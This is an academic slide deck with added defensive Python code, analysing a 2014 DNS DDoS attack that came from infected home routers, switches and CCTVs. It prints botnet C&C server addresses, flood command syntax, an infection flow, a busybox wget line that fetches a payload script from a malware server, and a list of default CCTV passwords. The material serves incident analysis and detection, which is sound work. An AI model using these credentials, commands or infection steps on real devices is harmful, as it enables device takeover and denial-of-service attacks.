Case Study: DDoS Attack on DNS using infected IoT Devices
ACSAC 2015
Ki-Taek LEE*, Seungsoo BAEK, Seungjoo KIM**
zizihacker@korea.ac.kr, baek.seungsoo@gmail.com, skim71@korea.ac.kr
SANE (Security Analysis aNd Evaluation) Lab., CIST (Center for Information Security Technologies), Korea University
*1st Author, **Corresponding Author
Acknowledgement
This research was supported by the MSIP (Ministry of Science, ICT and Future Planning), Korea, under the ITRC (Information Technology Research Center) support program (IITP-2015-R0992-15-1006) supervised by the IITP (Institute for Information & communications Technology Promotion).
Internet down after cyberattack
29 November, 2014: 15,000,000 packets per second
SK Broadband, one of the largest providers of broadband Internet access in Korea, was attacked by the Distributed Denial-of-Service (DDoS) over the weekend, disconnecting its Internet services for about an hour.
DDoS is a kind of cyberattack in which multiple compromised systems are used to target a single network or a machine and make it unavailable to users.
On Saturday at 10:55 a.m., the traffic on SK Broadband’s DNS server soared up to 15 million packets per second (PPS), from its usual average of about 1 million PPS. PPS refers to the number of database transactions performed per second.
SK Broadband users near Seocho and Dongjak districts in southern Seoul were without Internet from 10:55 a.m. until 12:05 p.m. on Saturday.
[1] Internet down after cyberattack (JOONGANG DAILY, Dec 2014)
Internet down after cyberattack
[Chart: DNS request queries per minute on Nov 29th, 2014; x-axis: time, y-axis: DNS request queries. Average queries per minute in the labelled normal periods: 169,640 and 182,589; peak during the attack: 9,136,090, more than 50 times the normal incoming traffic.]
How to detect DDoS attack
• Our own <Near-Real Time DNS Query Analyzing System for Detecting DDoS Attacks>
[2] Study on the near-real time DNS query analyzing system for DNS amplification attacks, KIISC (2015)
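A rate-based query monitor in the spirit of the near-real time analyzing system named above, as an added example (it is not the authors' system). The log line format `<date> <time> <client_ip> <qname> <qtype>` and the sample lines are constructed; the detector keeps a baseline from the previous unflagged minutes, flags a minute whose count reaches a multiple of that baseline (the deck's attack was more than 50 times the average), and then lists the heaviest source addresses of that minute, which is the step that led the authors to the infected devices.

```python
"""Rate-based DNS query monitor. Added example, not the authors' system.
Log format ('<date> <time> <client_ip> <qname> <qtype>') and the sample
lines are constructed for this example."""
from collections import Counter, defaultdict

# Constructed sample: two quiet minutes, then one minute with a burst of
# queries from two source addresses (documentation ranges, not real clients).
SAMPLE_LOG = (
    "2014-11-29 10:53:12 203.0.113.10 www.example.com A\n"
    "2014-11-29 10:53:40 203.0.113.11 mail.example.com MX\n"
    "2014-11-29 10:54:05 203.0.113.12 www.example.com AAAA\n"
    "2014-11-29 10:54:59 203.0.113.10 ns.example.net A\n"
    + "".join(
        f"2014-11-29 10:55:{s:02d} 198.51.100.{5 + (s % 2)} q{s}.example.org A\n"
        for s in range(60)
    )
)


def queries_per_minute(lines):
    """Return (queries per minute, per-minute source-address counters)."""
    counts = Counter()
    sources = defaultdict(Counter)
    for line in lines:
        if not line.strip():
            continue
        date, time, client, _qname, _qtype = line.split()
        minute = f"{date} {time[:5]}"
        counts[minute] += 1
        sources[minute][client] += 1
    return counts, sources


def flag_minutes(series, factor=50, window=60):
    """series: (minute, count) pairs in time order.

    The baseline is the mean of up to `window` previous *unflagged* minutes,
    so an attack minute does not inflate the baseline for the next one.
    Returns (minute, count, ratio to baseline) for every minute whose count
    is at least factor * baseline."""
    flagged = []
    history = []
    for minute, count in series:
        if history:
            recent = history[-window:]
            baseline = sum(recent) / len(recent)
            if baseline > 0 and count >= factor * baseline:
                flagged.append((minute, count, round(count / baseline, 1)))
                continue
        history.append(count)
    return flagged


def top_sources(sources, minute, n=5):
    """Heaviest source addresses in a minute, ties broken by address."""
    return sorted(sources[minute].items(), key=lambda kv: (-kv[1], kv[0]))[:n]


if __name__ == "__main__":
    counts, sources = queries_per_minute(SAMPLE_LOG.splitlines())
    for minute, count, ratio in flag_minutes(sorted(counts.items()), factor=10):
        print(f"{minute}: {count} queries, {ratio}x baseline")
        print("  top sources:", top_sources(sources, minute))
```

Excluding flagged minutes from the baseline matters for a near-real time system: during the hour-long outage described above, a baseline that absorbed the attack minutes would stop flagging within a few minutes.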
Zombie PCs? Zombie Devices!
• We analyzed the source IP addresses of the packets and found the cause of the attack.
• The attack came from IoT devices such as home routers, network switches, network-connected CCTVs and IPTV set-top boxes (STBs), not from the computers that are generally used for DDoS attacks.
Benefits of IoT devices for DDoS
Why do attackers want to use IoT devices for DDoS attacks?
• Any TIME communication: on the move, night, daytime
• Any PLACE communication: outdoor, indoor (away from the computer), at the computer
• Any THING communication: between computers, human to human (not using a computer), human to thing (using generic equipment), thing to thing
[3] The new dimension introduced in the Internet of things - Recommendation ITU-T Y.2060 (06/2012)
Top 10 IoT Vulnerabilities (2014)
A list of the top 10 Internet of Things vulnerabilities
Rank Title
I1 Insecure Web Interface
I2 Insufficient Authentication/Authorization
I3 Insecure Network Services
I4 Lack of Transport Encryption
I5 Privacy Concerns
I6 Insecure Cloud Interface
I7 Insecure Mobile Interface
I8 Insufficient Security Configurability
I9 Insecure Software/Firmware
I10 Poor Physical Security
[4] OWASP Internet of Things Project (https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project)
Case 1. Home router
• Tracing source IP addresses of the DDoS and identifying the devices
• Connecting to the admin pages of the home router
• Connecting to telnet for analysis
• Some weird processes are running.
Case 1. Home router
• Download the firmware from the home router
• Reverse engineer the firmware
- busybox is used to download the malware
- 192.3.205.154 is used as C&C and distribution server
- 217.71.50.13 is used as distribution server
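Static triage of a firmware image for the kind of network indicators the reverse-engineering step above turned up, as an added example (not the authors' tooling). The image bytes are constructed; the two addresses in `KNOWN_BAD` are the C&C and distribution servers named on the slide, and the download URL built on one of them is an assumption for the sample. The code pulls printable strings, extracts IPv4 literals with octet validation and a version-string filter, collects URLs and download commands, and cross-checks the addresses against the known-bad list.

```python
"""Firmware image triage for network indicators. Added example, not the
authors' tooling. The image bytes are constructed; KNOWN_BAD holds the two
server addresses named on the slide."""
import re

KNOWN_BAD = {"192.3.205.154", "217.71.50.13"}  # from the slide above

# Constructed stand-in for a firmware image: binary junk with embedded strings.
SAMPLE_IMAGE = (
    b"\x7fELF\x01\x01\x01\x00" + b"\x00" * 16
    + b"busybox wget http://192.3.205.154/bin.sh -O /tmp/bin.sh\x00"  # assumed URL
    + b"/var/run/getbinaries.sh\x00"
    + b"Version 2.1.0.5\x00"  # dotted quad that is a version string, not an address
    + b"999.1.1.1\x00"  # octet out of range, must be rejected
    + b"tftp -g -r mips 217.71.50.13\x00"
    + b"\xff\xfe" * 8
)

_IPV4 = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")
_VERSION_PREFIX = re.compile(r"(?i)\bv(?:er(?:sion)?)?\.?\s*$")
_URL = re.compile(r"\b(?:https?|tftp|ftp)://[^\s\"'<>]+")
_FETCH = re.compile(r"\b(?:busybox\s+)?(?:wget|tftp|ftp|curl)\b")


def strings(blob, min_len=4):
    """Printable ASCII runs, like the `strings` utility."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def _valid_ipv4(text):
    return all(0 <= int(octet) <= 255 for octet in text.split("."))


def extract_ipv4(blob):
    """IPv4 literals with valid octets, skipping dotted quads that follow a
    'version'/'ver'/'v' label."""
    found = set()
    for s in strings(blob):
        for m in _IPV4.finditer(s):
            if _valid_ipv4(m.group(1)) and not _VERSION_PREFIX.search(s[: m.start()]):
                found.add(m.group(1))
    return found


def extract_urls(blob):
    return {u for s in strings(blob) for u in _URL.findall(s)}


def fetch_commands(blob):
    """Strings that look like download commands (wget/tftp/ftp/curl)."""
    return [s for s in strings(blob) if _FETCH.search(s)]


def triage(blob, known_bad=KNOWN_BAD):
    ips = extract_ipv4(blob)
    return {
        "ipv4": ips,
        "urls": extract_urls(blob),
        "fetch_commands": fetch_commands(blob),
        "known_bad_hits": ips & set(known_bad),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_IMAGE).items():
        print(f"{key}: {value}")
```

The same pass works on an extracted root filesystem or on a single suspicious binary; a hit in `known_bad_hits` on a device that never contacted those hosts before is a strong hint that the firmware was replaced, which is the CCTV case later in the deck.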
Case 1. Home router
• It spreads by finding new devices through a random scan of IP addresses.
• Attack command syntax found in the malware:
TCP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <flags (syn, ack, psh, rst, fin, all) comma seperated> (packet size, usually 0) (time poll interval, default 10)
Case 1. Home router
• Malware obtained from the distribution server and bin.sh
Name Size
arm 98KB
arm.i64 1,105KB
i586 77KB
i586.i64 985KB
i686 79KB
mips 122KB
mipsel 125KB
ppc 92KB
sparc 105KB
superh 60KB
Case 2. Network Switch
• Similar to “Case 1”, but something is different
• Malicious commands
• Source code: Lightaidra
[5] Lightaidra, https://github.com/eurialo/lightaidra
Case 2. Network Switch: comparison of the Basic group and the Aidra group
• File list
- Basic group: arm, mips, mipsel, ppc, s, sh
- Aidra group: mips_aidra, superh_aidra, arm_aidra, mipsel_aidra
• C&C or distribution server IP
- Basic group: automation.whatismyip.com (72.233.89.199)
- Aidra group: IRC connect 76.73.104.50:6667, 76.73.103.60:6667, 76.73.104.243:6667, 205.188.14.92:6667
• Command list
- Access Commands (login/logout)
- Miscs Commands (run/check)
- Scan Commands (scan)
- DDoS Commands: .spoof <IP> (IP spoofing attack); .synflood, .nssynflood; .ackflood, .nsackflood
• Attack command
- Basic group: .synflood
- Aidra group: .*flood->[m,a,p,s,x], where * is one of syn, nssyn, ack, nsack and a=arm / p=ppc / s=superh / x=x86; example: .nssynflood->s <host> <port> <secs>
Case 2. Network Switch: behaviour of the Basic group and the Aidra group
• configure spoof (IP spoofing)
• advscan (after scanning a Class B range, check ID/password or access telnet to infect the device)
• Attack running
• Version check
• Run attack script (including malware update): /var/run/getbinaries.sh
- binaries: mips_aidra, superh_aidra, arm_aidra, ppc_aidra (<OOO_aidra>)
- servers: 76.73.104.50, 46.40.191.171, 217.23.10.250
Case 3. CCTV
• Trace the source IP addresses of the DDoS attack and find the management page of the CCTV
• Malware on CCTV
- password is changed
- updated with infected firmware (gets root permission)
• rtsp://<CCTV IP>/trackID=1&basic_auth=base64([id:pw])
- root / (empty)
- root / root
- root / admin
- admin / admin
- admin / 1234
- admin / 12345
- admin / smcadmin
- admin / (empty)
Case 3. CCTV
• Scanned 120,000,000 IP addresses across the Internet with the tool and found 23,507 CCTV IP addresses
• 9,063 of them are vulnerable CCTVs
• Default IDs and passwords are commonly used
Amount of infected devices
• Approximately 2,000,000,000 IP addresses
• Home router: 1,151,940 (96.03%)
• Network switch: 19,754 (1.65%)
• CCTV: 23,507 (1.95%)
• STB: 2 (0.00%)
• others: 4,349 (0.36%)
Infection flow of IoT
External infection flow (from the attacker or an infected IoT device to the IoT device that becomes the victim):
① IP range scan
② access to the victim’s IP through telnet or web
③ attack with default (ID, password) or remote command execution
④ upload malicious code
Internal infection flow (on the victim):
① delete temp files and directories
② kill main services (telnet, main daemon and ...)
③ download & overwrite infected busybox from C&C server
④ delete the downloaded file at ③
⑤ overwrite infected busybox to main daemon
⑥ delete the infected busybox at ⑤
⑦ execute main daemon
⑧ block and kill telnet, ssh using iptables for protecting itself
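A host-side check for the self-protection steps of the internal infection flow above (main services killed, busybox overwritten, telnet and ssh blocked with iptables), as an added example that is not from the study. The command outputs are constructed samples in the formats of `iptables -S` and busybox `ps`, and the list of expected services and the "known-good busybox" bytes are assumptions; on a real device the reference hash would come from the vendor image. Each indicator is a separate function so an operator can run them individually over outputs collected from a device.

```python
"""Host indicator check for the internal infection flow. Added example, not
from the study. Command outputs are constructed samples in the formats of
`iptables -S` and busybox `ps`; EXPECTED_SERVICES and the busybox bytes are
assumptions for the example."""
import hashlib
import re

EXPECTED_SERVICES = ("telnetd", "httpd")  # assumption: what this device should run
REMOTE_ADMIN_PORTS = {22, 23}

# Constructed `iptables -S` output from a device that has locked its admins out.
SAMPLE_IPTABLES = """\
-P INPUT ACCEPT
-P FORWARD ACCEPT
-P OUTPUT ACCEPT
-A INPUT -p tcp -m tcp --dport 23 -j DROP
-A INPUT -p tcp -m multiport --dports 22,8022 -j DROP
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
"""

# Constructed busybox `ps` output: telnetd is gone and something runs from /var/run.
SAMPLE_PS = """\
  PID USER       VSZ STAT COMMAND
    1 root      1208 S    init
   88 root      1340 S    httpd -p 80
  214 root      2660 S    /var/run/.update
"""

# Constructed stand-ins for the vendor busybox and a tampered copy.
GOOD_BUSYBOX = b"\x7fELF-constructed-vendor-busybox"
TAMPERED_BUSYBOX = GOOD_BUSYBOX + b"-patched"

_DROP_RULE = re.compile(r"^-A (\S+) .*?--dports? (\S+) .*?-j (?:DROP|REJECT)\b")


def _expand_ports(spec):
    """'22,8022' or '20:23' -> set of ints (multiport and range syntax)."""
    ports = set()
    for part in spec.split(","):
        lo, _, hi = part.partition(":")
        ports.update(range(int(lo), int(hi or lo) + 1))
    return ports


def blocked_ports(iptables_output, chain="INPUT"):
    """Destination ports a chain drops or rejects. Only port-based rules are
    parsed; source- or interface-based blocks are out of scope here."""
    blocked = set()
    for line in iptables_output.splitlines():
        m = _DROP_RULE.match(line.strip())
        if m and m.group(1) == chain:
            blocked |= _expand_ports(m.group(2))
    return blocked


def running_commands(ps_output):
    """COMMAND column of busybox `ps` output (header line skipped)."""
    commands = []
    for line in ps_output.splitlines()[1:]:
        fields = line.split(None, 4)
        if len(fields) == 5:
            commands.append(fields[4])
    return commands


def missing_services(ps_output, expected=EXPECTED_SERVICES):
    names = {cmd.split()[0].rsplit("/", 1)[-1] for cmd in running_commands(ps_output)}
    return [svc for svc in expected if svc not in names]


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def assess(iptables_output, ps_output, busybox_bytes, reference_sha256):
    """Return a list of findings; an empty list means no indicator fired."""
    findings = []
    locked = blocked_ports(iptables_output) & REMOTE_ADMIN_PORTS
    if locked:
        findings.append(f"remote admin ports blocked in INPUT: {sorted(locked)}")
    gone = missing_services(ps_output)
    if gone:
        findings.append(f"expected services not running: {gone}")
    odd = [c for c in running_commands(ps_output) if c.startswith(("/var/run/", "/tmp/", "/dev/"))]
    if odd:
        findings.append(f"processes executing from writable paths: {odd}")
    if sha256_hex(busybox_bytes) != reference_sha256:
        findings.append("busybox hash does not match the vendor reference")
    return findings


def demo():
    """Run the check over the constructed samples (all four indicators fire)."""
    return assess(SAMPLE_IPTABLES, SAMPLE_PS, TAMPERED_BUSYBOX, sha256_hex(GOOD_BUSYBOX))


if __name__ == "__main__":
    for finding in demo():
        print("-", finding)
```

Step ⑧ is the one that makes remediation hard: once the bot drops inbound 22/23, the operator cannot log in to run this check remotely, so the outputs have to be collected from the console or the device re-flashed, which is why the deck concludes that more active defenses are needed.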
Conclusion
• The Internet of Things (IoT) is beginning to grow significantly.
• IoT devices have many vulnerabilities.
• All devices can be zombie devices.
• We need more active defenses.
Future works
• Automatic vulnerability scanner for IoT
E-Mail: zizihacker@korea.ac.kr, zizihacker@gmail.com
Thanks for your attention.
Questions?